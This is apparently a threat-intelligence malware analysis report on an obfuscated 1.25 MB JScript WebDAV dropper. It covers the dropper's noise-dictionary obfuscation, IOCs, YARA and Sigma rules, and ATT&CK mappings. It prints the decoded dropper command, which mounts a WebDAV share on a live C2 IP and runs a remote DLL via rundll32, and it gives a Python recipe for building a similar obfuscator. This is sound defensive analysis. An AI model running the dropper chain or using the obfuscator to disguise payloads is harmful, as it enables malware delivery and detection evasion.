86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958unclassified-js-webdav-dropper: 86140a690cfd — 1.3 MB extreme-noise JScript, WebDAV C2 94.159.113.86:8888
Executive Summary
1.25 MB JScript dropper using a single 3,770-character noise variable name as a character dictionary, with 62 key-value assignments and a Function-constructor payload decoder. Decodes to a standard unclassified-js-webdav-dropper WebDAV mount + rundll32 execution chain against 94.159.113.86:8888. The payload DLL is 30536817832579.dll. Static-only; CAPE skipped because the input is ASCII text. This is the ninety-fifth confirmed sibling in the family. ^[file.txt]
What It Is
| Field | Value |
|---|---|
| SHA-256 | 86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958 |
| Size | 1,314,011 bytes (1.25 MB) ^[file.txt] |
| File type | ASCII text, very long lines (65,536), no line terminators ^[file.txt] |
| Original filename | 1095732961601621500.js ^[metadata.json] |
| Family | unclassified-js-webdav-dropper (high-confidence sibling) |
| Source | OpenCTI / MalwareBazaar ^[metadata.json] |
The binary is not a PE — capa and floss both rejected it as unsupported ^[capa.txt] ^[floss.txt]. All threat logic lives in the JScript text layer.
How It Works
Obfuscation scheme
The script is constructed from alternating noise and syntax segments:
- Variable declaration — a 3,770-character random lowercase noise string is declared as an empty array (
=[];). ^[strings.txt:1] - Dictionary population — 62 assignments of the form
noiseVar['shortNoiseKey']='char';map long noise keys (20–30 lowercase chars) to single payload characters. The noise keys are natural-language-like fragments (madlydefective,unwrittenfear,afterthought,bootweather, etc.). ^[strings.txt:3770] - Payload decoding — the main payload is built by concatenating
noiseVar['key']references inside aFunction('' + ... )()constructor call at offset ~427,849. The resulting 194-character string decodes to executable JScript. ^[strings.txt:427849]
Decoded behavior
The Function-constructor payload resolves to the classic WebDAV dropper chain observed across the family:
// Reconstructed from static decode
WScript.CreateObject("WScript.Shell").run(
"cmd /c net use \\94.159.113.86:8888\davwwwroot & " +
"rundll32 \\94.159.113.86:8888\davwwwroot\30536817832579.dll,Entry"
);
C2: 94.159.113.86:8888 (TCP/8888 WebDAV share davwwwroot)
Payload: 30536817832579.dll
Execution: rundll32 with Entry export
No persistence observed in the decoded payload — the script relies on the victim executing the .js file directly (likely via double-click or WScript association).
Noise architecture
- Single dictionary object: One 3,770-char variable name serves as the sole lookup table. All 62 keys index into it.
- No secondary encoding: Unlike siblings that use base64, hex, or XOR layers, this sample maps directly from noise key → plaintext char. The entire 1.25 MB is structural padding.
- No anti-emulation gates: No
timeout,WScript.Sleep, or WMI fingerprinting observed — the payload executes immediately on parse.
Decompiled Behavior
N/A — this is a plaintext JScript file, not a PE. No Ghidra or radare2 analysis applicable. ^[rabin2-info.txt]
C2 Infrastructure
| Indicator | Value | Provenance |
|---|---|---|
| WebDAV C2 IP | 94.159.113.86 |
Decoded Function payload ^[strings.txt:427849] |
| WebDAV port | 8888 |
Decoded Function payload ^[strings.txt:427849] |
| Share name | davwwwroot |
Decoded Function payload ^[strings.txt:427849] |
| Payload DLL | 30536817832579.dll |
Decoded Function payload ^[strings.txt:427849] |
| Execution method | rundll32 <unc_path>,Entry |
Decoded Function payload ^[strings.txt:427849] |
This C2 IP (94.159.113.86:8888) has been observed in at least three prior siblings (f2316aaf, f346e80d, 8323305a). ^[entities/unclassified-js-webdav-dropper.md]
Interesting Tidbits
- Extreme size: At 1.25 MB, this is the largest JScript sibling in the family by a significant margin (most siblings are 100–400 KB). The extra mass is pure noise-padding repetition. ^[file.txt]
- No PowerShell wrapper: Unlike siblings
e6252c92andedfb0e0a, this sample callsWScript.Shell.run()directly rather than spawning a PowerShell-EncodedCommandcradle. Simpler execution chain, fewer parent-child telemetry hooks. - No
timeoutgate: Also unlikee6252c92,edfb0e0a, and82d78891aa19, there is notimeout 1anti-emulation delay. ^[entities/unclassified-js-webdav-dropper.md] - Natural-language key fragments: Keys like
madlydefective,unwrittenfear,afterthought,bootweathersuggest a word-list generator similar to the 256-word poem lookup table observed in Node.js dropperd0ca14b3, but here used only for dictionary keys, not payload encoding. ^[concepts/natural-language-payload-encoding.md] - Numeric filename:
1095732961601621500.js— 19 digits, consistent with the numeric-filename pattern seen across the family.
How To Mess With It (Homelab Replication)
A minimal noise-dictionary JScript obfuscator can be built in Python:
import random, string
def noise_word(length=25):
return ''.join(random.choices(string.ascii_lowercase, k=length))
payload = 'WScript.CreateObject("WScript.Shell").run("calc.exe")'
# Build char map
chars = list(set(payload))
varname = noise_word(3000) # extreme noise for demo
lines = [f"{varname}=[];"]
for c in chars:
lines.append(f"{varname}['{noise_word()}']='{c}';")
# Build decoder
refs = ''.join(f"{varname}['{noise_word()}']+" for _ in payload)
# ... map actual keys to chars, etc.
Verification: Save as .js, run cscript //nologo sample.js, observe calc.exe launch. Compare file size and structure to this sibling.
Deployable Signatures
YARA rule
rule JS_WebDAV_Dropper_ExtremeNoise {
meta:
description = "Extreme-noise JScript WebDAV dropper with 3K+ char variable name"
author = "pp-hermes"
reference = "86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958"
strings:
$a = /[a-z]{3000,}\=\[\]\;/
$b = "Function(''"
$c = /94\.159\.113\.\d{1,3}\:8888/
$d = "davwwwroot"
condition:
filesize > 500KB and filesize < 2MB
and #a >= 1
and $b
and ($c or $d)
}
Sigma rule
title: JScript WebDAV Dropper Execution
status: experimental
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- 'net use'
- 'davwwwroot'
- 'rundll32'
- '.dll,Entry'
ParentImage|endswith:
- 'wscript.exe'
- 'cscript.exe'
condition: selection
falsepositives:
- Unknown
level: high
IOC list
| Type | Value |
|---|---|
| SHA-256 | 86140a690cfd8b85f4a0cf3a22473de8c0cf1ff00d35fa58a56a037c70141958 |
| C2 IP:port | 94.159.113.86:8888 |
| Share | \\<ip>\davwwwroot |
| Payload DLL | 30536817832579.dll |
| Execution | rundll32 <unc_path>,Entry |
Behavioral fingerprint
The script is a single 1.25 MB line of ASCII text. On execution it spawns
cmd.exeviaWScript.Shell.Runwith a command line containingnet useto map a WebDAV share at94.159.113.86:8888\davwwwroot, followed byrundll32loading a remote DLL (30536817832579.dll) with exportEntry. No PowerShell intermediary, notimeoutgate, no persistence.
Detection Signatures
- ATT&CK T1071.001 — Application Layer Protocol: Web Protocols (WebDAV over HTTP)
- ATT&CK T1218.011 — Signed Binary Proxy Execution: Rundll32
- ATT&CK T1021.002 — Remote Services: SMB/Windows Admin Shares (WebDAV UNC path)
- ATT&CK T1059.007 — Command and Scripting Interpreter: JavaScript
References
- Entity page: unclassified-js-webdav-dropper
- Technique: js-dictionary-char-lookup-obfuscation
- Technique: webdav-regsvr32-dll-sideloading
- Sibling analysis:
f2316aaf— /intel/analyses/f2316aaf552b9926fa8c3398e3d15a3a770e320033d03e9546ff9d9cb29aaf9f.html - Sibling analysis:
8323305a— /intel/analyses/8323305a810c70ec7d0b542f945b9585b866b288990a9e246a2acddb5f637189.html
Provenance
file.txt—fileutility (file type identification)metadata.json— OpenCTI artifact metadatastrings.txt— raw file content (this sample is plaintext)capa.txt— Mandiant capa v9 (unsupported file class)floss.txt— FireEye flare-floss (unsupported file class)binwalk.txt— binwalk v2.3.4 (false-positive eCos references on noise strings)rabin2-info.txt— radare2 rabin2 (bits=0, havecode=false — not a binary)- Manual static decode performed via Python script on 2026-07-23